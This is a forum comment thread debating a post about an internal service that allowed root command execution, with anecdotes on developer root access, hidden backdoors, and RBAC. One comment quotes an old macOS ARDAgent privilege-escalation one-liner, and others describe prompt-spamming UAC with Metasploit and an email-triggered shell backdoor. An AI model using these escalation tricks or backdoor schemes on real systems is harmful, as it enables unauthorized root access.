Asking nicely for root command execution and getting it
dj_mc_merlin 2021-08-18 01:46:17 +0000 UTC [ - ]
Developers have little RCEs throughout the entire system, it's how they do their jobs. If even system with millions of dollars worth of design and security reviews regularly get hacked by people with no internal access to it or its source code, how can you hope to stop someone who already has a foothold and can see into the system, including a bunch of its config files?
The real answer is not to stop developers from doing so. That's a never ending uphill battle. You implement very good logging and RBAC systems instead. Now everybody could hack the system if they wished to, but they would be sued into oblivion if they tried to do it for nefarious reasons.
IMO the main purpose of RBAC is not really to stop developers from doing malicious activity, but to stop the stupid ones from breaking the system. The smart ones will be able to get around whatever safeguards you put in, as some of them will undoubtedly be designed by those not so fortunate or experienced. Not every developer has a good understanding of infosec and its many, _many_ ways of circumventing what seems to be an impossible defence. Unless you know all the tricks in the book already, whatever you write is most definitely gonna be swiss cheese.
jnwatson 2021-08-18 14:38:05 +0000 UTC [ - ]
It is the least productive environment I've ever been in. It has made me a lot more aware of how much stuff we download from the internet for development, since I can't do that in this situation.
Fortunately, I get paid by the hour.
Thiez 2021-08-18 17:06:21 +0000 UTC [ - ]
acdha 2021-08-18 18:30:26 +0000 UTC [ - ]
eyelidlessness 2021-08-18 03:42:40 +0000 UTC [ - ]
And zero trust is the only way to mitigate that. There are so many bad security takes in this discussion and I’ve barely read half of it. This isn’t an ignorant community. The implication is that every slightly or significantly bad take is compounded by culture and organizational ignorance.
The only solution is systems that can’t be accessed by humans by design. And building better reporting and isolated debugging tools to accommodate that.
closeparen 2021-08-18 05:49:59 +0000 UTC [ - ]
athrowaway3z 2021-08-18 08:58:45 +0000 UTC [ - ]
Your solution isn't wrong. It's just never going to be cheap and simple enough to expect it as a minimum for every organization.
ramraj07 2021-08-18 04:42:23 +0000 UTC [ - ]
MattPalmer1086 2021-08-18 08:13:58 +0000 UTC [ - ]
concordDance 2021-08-18 11:14:29 +0000 UTC [ - ]
MattPalmer1086 2021-08-18 12:01:32 +0000 UTC [ - ]
I've just spent a fair bit of time working on allowing very limited access to prod by devs to investigate core dumps. Took a lot of argument to get that, but the alternative was moving the core dumps out of prod, and that wouldn't fly due to the sensitivity of data that might be exposed. It's certainly not easy working in a highly secure environment.
mrweasel 2021-08-18 08:21:15 +0000 UTC [ - ]
mr-wendel 2021-08-18 00:14:58 +0000 UTC [ - ]
Maybe this is our version of the "infinite monkeys" thing: given enough software people, enough computers, and enough time, someone at a company will eventually grant universal remote root access to anyone who knows how to read some source code.
At one job, way back in the day, I had a dream that a shared web-hosting installer framework could give you root on whatever server hosted your stuff. Went to work the next day and indeed... it was true and trivially easy to exploit.Sadly, it was a custom wallpaper upload feature that ended up being the actual source of shenanigans. You get 3 guesses on what happened and probably need just one.
mewse 2021-08-18 00:59:25 +0000 UTC [ - ]
You.. quickly found the issue and patched it, and then balloons and streamers fell from the ceiling as the CEO strode over to shake your hand and pat you on the back and crack open a bottle of champagne to celebrate your promotion and give you a hefty performance bonus for saving the company and Dave Matthews played on the company’s sound system while everyone cheered for you and then when you finally left the celebration and went home you were tired and happy and newly wealthy and had become best friends with literally everyone at the company.
…right?
dredmorbius 2021-08-18 06:54:39 +0000 UTC [ - ]
The corresponding law of enterprise software: "Every program expands to provide root access to any arbitrary entity."
lccarrasco 2021-08-18 01:03:56 +0000 UTC [ - ]
They had no validation on file type and you could upload & access a script that executed commands server-side?
mr-wendel 2021-08-18 16:56:23 +0000 UTC [ - ]
It's really not pretty what can happen when you have a juicy target, plenty of time, and a perfect idea of how you can use it to your advantage.
Fortunately they weren't at all malicious... just looking for ways to grow their little empire to play their war games and hopefully make some cash.
ufo 2021-08-18 01:04:25 +0000 UTC [ - ]
TomVDB 2021-08-18 00:44:43 +0000 UTC [ - ]
He ran a service that piped all income emails to a script. If the email contained a magic cookie, the subsequent commands were executed on a shell, and the results emailed back to sender. There were no checks on who the sender was. :-)
I don’t think the IT people at his very big telecom equipment company would have approved. They never found out about this stunt, but he was later fired for running a password cracker on the company server farm.
perlgeek 2021-08-18 11:46:03 +0000 UTC [ - ]
He had questionable test/release/deployment practices, so they took his root privs away in prod, and instead made him build packages (that was mostly already done before) and hand them to the admin team.
Not to be deterred by useless administrative overhead, he added an environment variable where the application would look for code files, defaulting it to somewhere under /tmp. Then he could deploy his own hotfixes as a user.
The company only found out when one of the two prod servers was rebooted, /tmp/ was wiped, and suddenly one of the two servers exhibited lots of old, already fixed bugs.
tgsovlerkhgsel 2021-08-18 03:13:44 +0000 UTC [ - ]
TomVDB 2021-08-18 05:38:16 +0000 UTC [ - ]
dredmorbius 2021-08-18 06:51:51 +0000 UTC [ - ]
In the very early 1990s, PGP didn't exist, and the odds that the email content was independently encrypted were low.
Any network sniffer or filesystem access would have exposed the cookie.
Gys 2021-08-18 07:30:16 +0000 UTC [ - ]
I thought all email is still plaintext? The protocol does not support encryption?
dredmorbius 2021-08-18 07:53:53 +0000 UTC [ - ]
There is an increasing use of encryption-at-rest services (AFAIU Gmail is, though that's using a system-level, not user-level, key). There are some encrypted email services (e.g., Protonmail), in which contents are encrypted both in-flight and at-rest.
Not especially relevant to the anecdote here, but a critical concern for messaging opsec: email metadata, including sender, receiver, and subject, are not encrypted at rest or to the originating, receiving, and possibly transit systems, may also leak information, and are often more valuable and useful than contents themselves.
I find myself wondering if my correspondents who can't seem to provide contextually useful subject lines are actually doing me a favour, despite the annoyance factor ....
JeremyNT 2021-08-18 08:11:23 +0000 UTC [ - ]
Back in the 90s, though... not so much.
dredmorbius 2021-08-18 10:01:22 +0000 UTC [ - ]
https://datatracker.ietf.org/doc/html/rfc2487
Actual widespread implementation didn't occur until the 2010s.
STARTLS Everywhere launched in 2014. https://www.eff.org/deeplinks/2020/04/winding-down-starttls-...
Google have tracked the prevalence of TLS-based email connections ... since 2014: https://transparencyreport.google.com/safer-email
notacoward 2021-08-18 12:05:34 +0000 UTC [ - ]
raffraffraff 2021-08-18 11:56:57 +0000 UTC [ - ]
Did that company fail? Nope. IPO'd for billions. And most of the people who put out fires like those for years while the founders told us to our faces that we'd all be rich... got sod-all.
citrin_ru 2021-08-18 08:27:24 +0000 UTC [ - ]
I don't change jobs to often to say that this is how every largish company works, but it typical that if you point to a security hole, people are displeased (now they have to fix it). And if you don't want many enemies it is better to ignore security problems unless you can fix them yourself.
That partially explains the very sad state of corporate security.
speedgoose 2021-08-18 04:18:02 +0000 UTC [ - ]
osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
MattPalmer1086 2021-08-18 08:06:48 +0000 UTC [ - ]
In one instance, the service people told me they had to have root because they downloaded arbitrary scripts and executed them, so they couldn't possibly know what permissions would be required ahead of time... Sigh...
isoprophlex 2021-08-18 06:18:55 +0000 UTC [ - ]
People actually have comprehensive overviews of what they're running on their landscape?!
cranekam 2021-08-18 07:22:19 +0000 UTC [ - ]
theblazehen 2021-08-18 06:52:04 +0000 UTC [ - ]
philsnow 2021-08-18 09:49:41 +0000 UTC [ - ]
Johnny555 2021-08-18 01:11:57 +0000 UTC [ - ]
This change patched the hole
It didn't really patch the hole so much as it moved the hole to every command that was in that whitelist of commands that were ok to run as root. The author doesn't say when this was, but nowadays there are almost certainly better ways to solve this without letting these pre/post setup commands run as root.
yjftsjthsd-h 2021-08-18 02:14:13 +0000 UTC [ - ]
tyingq 2021-08-18 01:26:45 +0000 UTC [ - ]
hutzlibu 2021-08-18 07:38:24 +0000 UTC [ - ]
How?
The only clean solution I see (now or anytime in the past), would be to rewrite that "Actual Business Stuff" using the whole.
But that is expensive, maybe very expensive (I think this was clients code and going around and telling them to change maybe complex code of theirs ... is not something you want or can afford to do) So they just patched the hole up as much as they could do.
So I do consider it a patch(especially if the hardcoded commands as strings are verified commands and do not change or induce something else). Just maybe none that provides full security. But when you look at the state of things in IT in general ... I would say, there is indeed improvement, if at least gaping holes like this one gets fixed.
Johnny555 2021-08-18 15:50:26 +0000 UTC [ - ]
No way to answer that without knowing why it needs root.
especially if the hardcoded commands as strings are verified commands and do not change or induce something else
But now that invoked program becomes another weak link that can be exploited. And you don't even know what those innvoked commands are so don't know if anything can be hardcoded other than the path to the executable.
Yes, it's an improvement in security, but it's only one step that probably won't be revisited until, for example, someone finds out that there's an easily exploited buffer overflow in one of those invoked programs that run as root.
ericbarrett 2021-08-18 03:29:42 +0000 UTC [ - ]
h2odragon 2021-08-18 03:39:16 +0000 UTC [ - ]
https://www.cs.unc.edu/~jeffay/courses/nidsS05/attacks/seely...
hnick 2021-08-18 03:30:01 +0000 UTC [ - ]
So I just replaced the executable with a wrapper that checked what is calling it, then called the real one if allowed. I can't remember how but we probably blocked the original executable from general use, but even if we didn't then bypassing this check shows clear intent on the user's part. They can't claim ignorance, which is enough if it shows up in source code later or dies when we finally remove this software. Meanwhile we could move the other users one by one without any new ones sprouting up.
Of course, code reviews, check-in filters, and such might be a nicer solution but this place wasn't that organised. So we did what we could, and didn't really have to keep an active eye out.
sigjuice 2021-08-18 03:31:40 +0000 UTC [ - ]
breput 2021-08-18 03:56:50 +0000 UTC [ - ]
For example, a SEV 0 would be a total system unavailability incident, SEV 1 might be a major issue with parts of the system, SEV 3 is a less critical failure affecting a subset of users, etc.
You'll typically have a postmortem meeting afterwards to discuss the incident, the root cause, lessons learned, and action items to prevent future occurrences, which is the meeting described in the article.
amacneil 2021-08-18 03:59:07 +0000 UTC [ - ]
E.g.
https://www.gremlin.com/community/tutorials/how-to-establish...
https://www.atlassian.com/incident-management/kpis/severity-...
kaptain 2021-08-18 08:57:46 +0000 UTC [ - ]
raesene9 2021-08-18 08:10:20 +0000 UTC [ - ]
Docker/ContainerD/CRI-O etc are basically command execution as a service.
Kubernetes is basically distributed command execution as a service.
You can add controls to reduce/remove the risk of random people creating root processes on your cluster nodes, but out of the box it's usually possible.
0xbadcafebee 2021-08-18 00:04:50 +0000 UTC [ - ]
Assume your service is a remote exploit machine, and that you want to make it as inconvenient to exploit, and as easy to fix, as possible. (If you don't think your service is a remote exploit machine... I have news for you...)
geofft 2021-08-18 00:25:07 +0000 UTC [ - ]
If you let in any user from the company, what difference does it make that it required authentication beforehand? (As the article points out, it could make a difference in incident response if the service is conscientious about logging and log retention, but that's a whole different feature that "authentication" doesn't get you for free!)
If you let in a restricted set of users from the company, that's now a business-logic change, not just a technical toggle. How do you determine which users are allowed to use and which ones aren't?
outworlder 2021-08-18 00:37:43 +0000 UTC [ - ]
No it isn't. Just deploy a proxy in front of the app. Nginx works. If you have SSO, presumably you also have some detail on the business unit, or even what corporate mailing lists they are part of. Use that. Only allow requests through if they have been authenticated and the user is allowed to access the app.
A business logic change is only needed if you actually need RBAC and have different levels of access permissions.
closeparen 2021-08-18 01:31:59 +0000 UTC [ - ]
geofft 2021-08-18 00:56:53 +0000 UTC [ - ]
What I mean is that the business context around the app have changed, not simply the technical implementation. Whereas the app may previously have been, say, "Anyone in the company can extract structured data out of certain PDF files," the app is now "Approved people in the company can extract structured data out of certain PDF files." How do you get approved? Well, because your app is asserted to be a "remote exploit machine," possibly even the team that runs the app can't just give people access for the asking. They have to demonstrate some genuine business need in a way that's sufficient to satisfy the security department, and the security department might need to be involved.
This is not a change in how the app is deployed; it is a change in what the app is. It changes the project definition, because the requirement "Anyone at the company can..." not only got dropped, it got replaced with "Most people at the company cannot...", and in turn it probably changes whether upper management wanted to assign people to work on the project at all. If it's getting limited use, maybe it wasn't worth building an app for it at all and people should have just transcribed data by hand. Or maybe there was a mediocre SaaS that would do 50% of the job for you, and exploits are their problem, and you should have decided to buy the mediocre thing instead of building a better thing that not enough people can use.
closeparen 2021-08-18 01:37:16 +0000 UTC [ - ]
Is that seriously thing? I've often known a security team to demand that something go behind an ACL, and to set some general standards for the management of that ACL (periodic reviews, expiring inactive users, etc), but never to get involved about specific members.
db48x 2021-08-18 07:05:56 +0000 UTC [ - ]
fvold 2021-08-18 08:35:21 +0000 UTC [ - ]
Some corporations have morons for security auditors.
MattPalmer1086 2021-08-18 08:42:01 +0000 UTC [ - ]
Adding authorization might involve business logic changes I guess, but who is authorised is a business decision achieved with config/administration, not hard coded into the software... I would hope!
gamacodre 2021-08-18 00:32:55 +0000 UTC [ - ]
If users are involved, then yeah you also need some kind of RBAC for it to make any sense.
oh_sigh 2021-08-18 01:15:28 +0000 UTC [ - ]
yjftsjthsd-h 2021-08-18 01:58:34 +0000 UTC [ - ]
I hate to break it to you, but nothing in that blog is unusual in Enterprise in my experience. You appear to have been quite lucky:)
bjenkins358 2021-08-18 02:04:13 +0000 UTC [ - ]
oh_sigh 2021-08-18 02:59:54 +0000 UTC [ - ]
yuliyp 2021-08-18 04:02:46 +0000 UTC [ - ]
bigiain 2021-08-18 01:55:31 +0000 UTC [ - ]
oh_sigh 2021-08-18 03:00:24 +0000 UTC [ - ]
howinteresting 2021-08-18 03:24:44 +0000 UTC [ - ]
Obviously some of the specifics have to be elided because they're proprietary information, though.
Rachel is one of the very best SREs on the planet. Working with her has been one of the greatest privileges of my professional career.
atoav 2021-08-18 05:08:47 +0000 UTC [ - ]
This is like seeing a four inch crack during the construction of a bridge and still pressing on till it collapses. No, it actually is like planning a four inch wide crack into a bridge and finding it through a random inspection a year after. It should not only never happen, it should never even have been considered.
I understand that implementing a quick "do whatever you want"-feature might be practical but:
- anything that could get arbitrary strings from network input (or from anything other that has network input) needs to be validated and sanitized
- anything that dispatches commands on a machine from user/network input should run with the lowest possible privilege
- whitelisting is always simpler than blacklisting, but never understimate what a few whitelisted unix commands with arbitrary arguments can do. Maybe writing your own simple DSL is better for such a use case. It could even turn out to be a selling factor if it has a nice GUI
brianpan 2021-08-18 06:10:31 +0000 UTC [ - ]
I'm not sure what else we'll need, let me add some pre/post flexibility.
We have this useful tool let's use it for more things.
Let's standardize on this. Who wrote this? It's ok, we'll do a readiness review.
We have WHAT in production? This is going to make a crazy blog post.
atoav 2021-08-18 07:10:07 +0000 UTC [ - ]
Sure I sometimes have a little high standards compared to others, but how are we ever gonna fix software if we don't stop with the "let me quick..."
If you e.g. handle private data of people you should code as if every character you type had the ability to leak a persons data forever (because often it has). Programming is beautiful because it multiplies. If you do a good job, the fruits of your work can make many peoples lives better. The same is true into the other direction: With great power comes great responsibility.
I also happen to be a certified electrical engineer. There you also have situations where you'd want to "just quickly" fix something. Only that you don't do it because you would be liable if you burn someone's house down or kill them.
I'd love for the whole field to get a little bit more serious about the impact our work has if done badly.
cranekam 2021-08-18 07:25:29 +0000 UTC [ - ]
(Source: familiar with the incident)
hug 2021-08-18 00:12:17 +0000 UTC [ - ]
Metasploit just pops up a UAC prompt asking for escalation. Yes or no. Over and over and over again.
On any machine logged into by a local administrator user, if they're the standard kind of careless user, they'll just click yes without thinking and they're owned. If they're cautious, and on a box where UAC presents as a modal dialog, as per its default config, this essentially locks the user out of the OS until they click "yes"... and they're owned.
On an assessment we did at a local 200-seat business where they ran with admin rights on their local boxes, we got about a 90% escalation rate. The other 10% of people got up from their desks and went to ask the IT guy, which we considered a "pass" in that scenario.
Interesting stuff.
smcl 2021-08-18 10:23:19 +0000 UTC [ - ]
corty 2021-08-18 12:14:31 +0000 UTC [ - ]
wcarss 2021-08-18 13:47:04 +0000 UTC [ - ]
I think password managers matching domains with credentials might help a little here, but it normalizes finding random tabs with "google" asking for creds down below the point of noise. It often happens right as I log in in the morning to go into my first meetings, and I'm rushed.
Somewhere, someone has likely exploited this by now.
newbamboo 2021-08-18 14:54:59 +0000 UTC [ - ]
noneeeed 2021-08-18 12:46:02 +0000 UTC [ - ]
We've recently been aquired and the new company uses Outlook. I can't use the desktop app as it constantly asks me to go through the full authentication process. I have to use the web interface which is just fine for me as I mostly use macOS native apps for mail and calendar. I only use outlook to report phishing emails.
WrtCdEvrydy 2021-08-18 00:26:07 +0000 UTC [ - ]
We had a similar issue with a library that wouldn't install unless root so one of the developers just put his username/password into the box in a plaintext file so the script could basically assume it from the command line when needed... told noone about it.
hug 2021-08-18 00:51:39 +0000 UTC [ - ]
"Our application needs to run as domain admin". No, mate, it absolutely does not. "Well it definitely needs local admin". No, mate, it doesn't even need that. What it usually needs is write-access to a single folder or regkey somewhere that has default ACLs on it that only allow local admins, but trying to have that conversation is a waste of time.
Of course as soon as you say something like that, all support bets are off. Depending on the business you're working for you either suck it up so you have a 'support agreement' in place, or you do it properly and never talk to the vendor again. (Or option #3, you rebuild the app in its default "holy shit this is how my business gets owned" mode, place a support call, and have them fix that instance while you watch so you can replicate their efforts elsewhere.)
Most of the same set of vendors get their panties in a twist when you tell them their database is on RDS, too, but that's a whole different argument to have with these people.
jasonjayr 2021-08-18 01:00:53 +0000 UTC [ - ]
1) only ran in MSIE
2) required the domain policy to permit VBScript
3) required permission to launch + invoke local COM/applications
4) served over http://
All just so they could direct MSWord to directly print the server-side generated Sales Order template.
I audibly gasped and asked if they knew this put our systems at extreme risk, and the tech talking me through it basically shrugged "it's how it works"
Thankfully that webapp 'upgraded' years ago so that's no longer how it's done, but when it's the only way to get orders into your business from one of your top 10 customers, you just setup a workstation to do it :(
djrogers 2021-08-18 02:58:48 +0000 UTC [ - ]
20 years in the vendor side, and I can count on one hand the number of times a customer followed the recommended process to create a limited user for one of our AD services. Every other time - just run it as an admin service account, and if they’re feeling motivated we might get a dedicated admin account created.
It’s very frustrating…
z3t4 2021-08-18 05:53:15 +0000 UTC [ - ]
pjc50 2021-08-18 07:42:00 +0000 UTC [ - ]
Loranubi 2021-08-18 09:10:27 +0000 UTC [ - ]
schlowmo 2021-08-18 02:01:00 +0000 UTC [ - ]
Well this works the other way around too. I found this especially true when delivering software which is considered an interim solution.
More than once I got root privileges on customer machines or seen my software run as root because the project owner found it too cumbersome to deal with his own employers security regulations. Or just wasn't given the budget to deal with it properly. Sometimes it's easier to get an exception than to follow protocol.
This is coming back to haunt you if something goes wrong or an interim solution wasn't so interim after all. If someone responsible for auditing permissions asks at this later stage it was always the vendors fault.
anyfoo 2021-08-18 02:16:01 +0000 UTC [ - ]
franga2000 2021-08-18 10:58:26 +0000 UTC [ - ]
If the software limited me to not running as root, I would have probably spent far longer debugging other issues and digging through 100s of lines of strace output.
mauvehaus 2021-08-18 13:24:00 +0000 UTC [ - ]
And using them in prod should be grounds for dismissal, or at least pretty severe legal liability if things go wrong as a result.
[0] https://m.youtube.com/watch?v=F3d_Cu5Mzbk
franga2000 2021-08-18 16:13:10 +0000 UTC [ - ]
user5994461 2021-08-18 01:14:03 +0000 UTC [ - ]
Large companies have stopped giving administrator access years ago. The vendor could corrupt their way into some middle manager all they want, they have zero power over procurement and IT, users won't get administrator access to use the app.
If the app is really unusable, which it is, that must be preventing a whole lot of sales.
hug 2021-08-18 01:34:06 +0000 UTC [ - ]
This is untrue for low-end enterprise. Orgs with up to 10,000 seats run weird shitty local-admin-required products all over the place, usually due to legacy.
In consulting, I would regularly run into core LOB apps that not only required local admin but "couldn't" run as a Windows service and required a user to be logged on with the UI window open in order to function.
You spend hours using the associated Microsoft toolkit & various shims to make the product function without, but there's always another business who just does it the lazy way.
hhh 2021-08-18 01:24:50 +0000 UTC [ - ]
You can find more information about this here: https://docs.microsoft.com/en-us/windows/deployment/planning...
I run a VM that stays up to date with the latest Windows version that I install the toolkit on for testing.
(side tangent, the user of this application insisted they had the latest version, and with it being behind some login that required some form related to ITAR or something to register, we just had to trust him until I had him download it 'just in case.')
rckoepke 2021-08-19 00:05:17 +0000 UTC [ - ]
I'm also trying to use libpcap and USBPcap without local admin. They request UAC every time I open Wireshark to start a new capture session. (Needed for debugging raw Ethernet and serial stacks)
If you have any tips for either of these I am all ears!
corty 2021-08-19 08:26:06 +0000 UTC [ - ]
jcrites 2021-08-18 01:47:24 +0000 UTC [ - ]
I'm a software developer and wouldn't have it any other way. Software developers need root/admin access if you expect any development velocity and ability to solve problems in production with expedience. There are too many diagnostic operations that depend on having root/admin, and especially fixes to errors.
One exception might be if the production fleet is handled by a separate operations team – but I'm not in favor of this model, which has its own negative impact on velocity/delivery speed due to the coordination involved, and the tension between "software developers want to ship" and "operations team wants software to remain unchanging and stable".
I'm not in favor of operations teams until the software team is overwhelmed with support requests and their velocity is slowing down. In that case, I'd start with beefing up the support team; and then finally at tremendous scale with high operational burden, hire an operations team / SRE team to operate the system.
The solution is to make software responsible for owning/operating their own systems until they are extremely large scale (Amazon S3 scale) – as scale so large that rare spontaneous faults would eat up a significant percentage of the overall software team's time. I'm not opposed to having frontline customer support in front of the developers, potentially multiple tiers (since a lot of customers need to Read The Fine Manual); but once the escalation hits a developer, to expeditiously solve the problem they need root/admin.
Your software developers with root/admin access should still be logged such that central security team can observe what's going on on every machine at the company, via configuration of SSHD, and regular inspection of that config – e.g. a shell that logs off-box command execution in real-time by default, either for all commands or commands root; and this will capture what they're doing unless they go very far out of the way to conceal and obfuscate their activities. Even then, the initial steps to begin the concealment will show up in the logs, unless very well obfuscated.)
Lastly, if your team runs public web servers, then you need to listen on ports like 80 and 443 while requiring root. Well-written servers drop root immediately after opening the socket, but custom written servers may run on those ports and not drop capabilities and run in a container. For example, Faceook Messenger Platform's onboarding instructions and example code –https://developers.facebook.com/docs/messenger-platform/gett... – recommends binding a TCP port >1024:
``` app.listen(process.env.PORT || 1337, () => console.log('webhook is listening')); ```
Aside: Nice and professional port number there. If I'd written that documentation I would have used 8081 or 8443, and included a discussion of the implications of running a web server on HTTPS (443) or HTTP (80).
I understand that having software developers having root/admin on their machine is very different than non-tech jobs, but for any jobs in the engineering family it's essential. The builders and operators of a system should always have root access to it, because (1) it's needed for development throughput (2) they can trivially get root access anyway through a variety of different means, such as incorporating a grant of root access into the code they're shipping, with minor obfuscation.
At my last company I was also involved in a major effort to make easier to not run software as root. However, for "typical" services running on single-purpose machines or Virtual Machines that don't do anything but receive or process commands from any other software, and don't run any other software (besides company Infra), I think the risk is low. "root" and "nobody" are marginally different on a machine that runs a single application because an attacker who breaks in can access all of its data anyway.
It's true that with root an attacker can implant rootkits and more firmly maintain a grasp of the server, but competent FAANG companies (1) require MFA in order to log in to servers besides the initial hardware client in front of the user (2) will audit machines for unexpected changes like what I'm describing above. I'm guessing only highly sophisticated attackers like APTs would be able to conceal from those scans, and there will always be the record of initial penetration to review. Incident response will quickly fan out to all machines the pwned machines has communicated with. One of the FAANGs had complete network logs for machines like this and would have been able to inspect the network traffic.
Lastly, sophisticated corps employ defense-in-depth and multiple layers of redundancy like (1) you can't attempt to log into machines on the network without both being on the VPN and having authenticated certificates from the enterprise root authority, and (2) Bastion machines which can log commands being sent to machines even if the machines themselves don't, and so on.
hug 2021-08-18 02:12:46 +0000 UTC [ - ]
For one, devs don't need root in prod in the vast majority of shops, which aren't FAANG scale. Assuming a nice sane environment where your deploys to pre-prod mirror your prod environment, I can't think of many cases where having root on prod makes much difference. It's the inverse of your statement, where places that aren't massive should find it feasible to 1:1 their prod environment for the devs to noodle about in.
For two, statements like this one make me wary of a blanket policy of devs getting root:
> if your team runs public web servers, then you need to listen on ports like 80 and 443 while requiring root.
Have you heard of setcap and CAP_NET_BIND_SERVICE, perhaps? I know this is only one example of many where you may "need" root, but in a lot of cases devs just don't have the ops knowledge to know what they actually need.
lmm 2021-08-18 06:37:35 +0000 UTC [ - ]
You can and should mirror the environment, but it's rarely going to be perfect (particularly in terms of traffic), and while it's often worth putting time into better test environments, being able to just hop onto a prod machine and properly trace your programs' behaviour (which often means you need BPF probes or similar) is a gamechanger for fixing production problems quickly.
> Have you heard of setcap and CAP_NET_BIND_SERVICE, perhaps? I know this is only one example of many where you may "need" root, but in a lot of cases devs just don't have the ops knowledge to know what they actually need.
We absolutely don't. Would learning it actually be a good use of time though? Linux user accounts are not generally seen as a hard security boundary, local root exploits are ten-a-penny, and the user account that's running the service necessarily has full access to the actually important stuff (user data) anyway. Particularly in this age of disposable VMs for single processes, I'd think the cost-benefit favours running everything as root, giving developers root, and structuring your security model so that your servers don't trust each other.
jcrites 2021-08-18 02:26:27 +0000 UTC [ - ]
Meanwhile, as a developer you still need the ability to deploy applications unless some kind of "deployment layer" handles depositing new software versions onto the machine.
I'm also concerned about the lack of root for being able to inspect what's going wrong with software on the machine (`ps` and `lsof` and socket-specific equivalents). How do I take a heap dump or stack trace from erroneous software on a prod machine without root? How can I step through the software in a debugger? (You could argue that I shouldn't do this but it's a tradeoff between velocity and security, the right answer which may depend on the business we're in.)
Containers are kind-of this but I wouldn't use containers as security sandbox, since they're not designed for it. User namespaces get close, but I prefer to rely on the hypervisor for this kind of security boundary, not namespaces, cgroups, or containers – because the kernel API is massive and security vulnerabilities are found in it regularly. (Root exploits less often.)
How would you build an operate a server in production without root? I honestly don't have experience. All of my experience has been running installation scripts as root, and having personal root access for inspecting/debugging (potentially even live debugger attaching and stepping); unless the `sudo` commands were very carefully managed I wouldn't be able to use the majority of my standard toolkit for fixing problems, and I wouldn't be able to fix the problem if I found them.
Am I running out of file descriptors because the limit is set too low? OK, bump up the limit. That's a code change but I can initiate an emergency recovery by locally changing it on all machines in the fleet.
We should also acknowledge that there are different kinds of software systems. If I was working at Coinbase or on Payments at Stripe I might have a different perspective. I previously worked at AWS and now currently work on WhatsApp so I am still incredibly security-conscious, but the level of security required by a product is a negotiable product specification, not a hard-and-fast-rule like the necessary strength of a bridge in civil engineering.
[1] Postfix Architecture: http://www.postfix.org/OVERVIEW.html
chousuke 2021-08-18 06:34:10 +0000 UTC [ - ]
If it's possible for you to log into a server and just become root (hopefully there's at least sudo so you don't log in directly as root), you have to make sure your personal laptop or workstation is encrypted, your SSH key is passphrase-protected and you use an SSH agent (or even an external physical device) to store your private key. Certainly you should not be using passwords to log in anywhere. You should do these things anyway, but the more direct power you have, the more important it becomes.
This is especially true if you have programmatic access to a public cloud somewhere: you do not want any more power than necessary for any longer than necessary because administrator access to eg. an AWS account means that when it leaks your infra can be automatically compromised in less time that you can react in and you can't even put firewalls in front because it's accessible from the internet.
Leave the operations that require real power to CI systems and automated processes where you have some testing and review in the middle. Get your logs and memory dumps shipped out of the system into tools that actually help you make use of them; if you need to debug a live system as root, that should be an exceptional situation that raises all kinds of alarms so that it can be formally accepted.
I'm a guy whose job involves maintaining hundreds of systems and I'm always happy when I can do it with less power.
jcrites 2021-08-18 18:28:21 +0000 UTC [ - ]
Correct, at both FAANG I logged in as myself and had passwordless sudo. (Passwordless sudo being preferable to minimize the number of machines that have user password hashes at the company, since these can be brute-forced when employees set bad passwords).
> your SSH key is passphrase-protected and you use an SSH agent
I don't have long-lived SSH keys. The FAANGs where I've work use short-lived (~24h) SSH client certificates, issued by Single Sign On and a server-trusted SSH Certificate Authority, where the SSO authenticates the user via an MFA (typically FIDO2 or variants with a Yubikey press). (Yes, you can indeed employ CAs with SSH, and generate short-lived certificates [1]). I don't generally type my password after signing into my client machine, or possibly once more to authenticate into the corporate web framework (w/ MFA).
After that, every SSH action requires a individual MFA approval. It doesn't require a password or any SSH key protected by a password – I think long-lived SSH keys, like you'd protect by a password, are an anti-pattern because when employees leave the company or change teams you have to remember to revoke them or update their keys. With the SSH CA approach, you simply change which certs it's willing to issue to an employee for which servers based on policy; and then people who leave the company can't access that system altogether. You get the right behavior by default without anyone remembering to take action during off-boarding.
No long-lived SSH keys with passwords. Short-lived SSH certificates don't need their own passwords.
As a developer operating systems on a suite of servers, it's simply a business need for me to have SSH into the (virtual machines that I own) running on those servers (not necessarily the underlying hypervisors – those are an entirely different beast).
If you were in the cloud it's equivalent to being able to obtain SSH certificate that allows you to log onto e.g. EC2 instances. Or if I'm a team that's operating Bare Metal instances, I can log into those.
I don't accept that root is less than necessary to do my job. When things go wrong there are too many directions that debugging can go that you cannot explore without root. Like I mentioned, I can't take a machine out of service, and attach a debugger to it, and invoke the failing functionality. I can't change machine parameters that may fix the problem like memory limits. You can't even examine the contents of a number of crucial logs without it.
I agree with the principle of least access and employ it in my personal systems as well. At work, I think POLA results in you having root to every machine you're responsible for.
[1] https://engineering.fb.com/2016/09/12/security/scalable-and-... (Disclosure: the FAANG I currently work for is Facebook)
chousuke 2021-08-18 20:15:09 +0000 UTC [ - ]
Having a solution like that in place goes a long way towards reducing the immediate power you have available at any one time, so I don't think we disagree much at all.
jcims 2021-08-18 06:17:50 +0000 UTC [ - ]
It all boils down to this at the end of the day. There is clearly some level of tradeoff between control and velocity, and there are valid business cases for setting the dial just about anywhere on the spectrum.
pjmlp 2021-08-18 14:14:53 +0000 UTC [ - ]
Also even for Windows, in cloud deployment the only admin access we tend to have in production are dashboards, no one gets to touch the actual machine.
In enterprise consulting projects, in security conscious customers, I never got Admin account directly, only temporarily via tooling that would request for it with a couple of hours duration, and installing software required IT tickets.
arpa 2021-08-18 06:34:12 +0000 UTC [ - ]
floatingatoll 2021-08-18 06:41:35 +0000 UTC [ - ]
wging 2021-08-18 06:24:16 +0000 UTC [ - ]
How common is this case, really? I'd expect most public-facing services, even really high-scale/'special' stuff, to really be instantiated inside a private network (VPC or suchlike, scoped down to just that service if you're lucky) and not internet-accessible, fronted by public-facing load balancers listening on 80/443 that the service team doesn't need or want to control. AWS's ALBs and various equivalents definitely allow for that. In such a situation there's no need for the internal port that your service hosts listen on to match the external port (though having root on those boxes may be desirable for many other reasons).
(of course, if your public web servers are the load balancers themselves, that is different...)
pmontra 2021-08-18 07:03:50 +0000 UTC [ - ]
corty 2021-08-19 08:49:02 +0000 UTC [ - ]
- Unified TLS config and certificate deployment to your chosen common webserver. Never again having to fiddle with yet another crappy vendor configuration not knowing about anything beyond DES, Java crapping itself with larger certificates, vendors not patching TLS library problems for ages.
- Unified log format: Vendors never stick to a proper format, but everyone can read and parse apache logs. Also, easier handling through unified output to syslog/logstash/whatever.
- Unified authentication: No need to wait for all your vendors to support your orgs chosen SSO scheme. Just let your common webserver handle things and pass on some 'X-Authenticated-User: joe'. Most vendors do handle those.
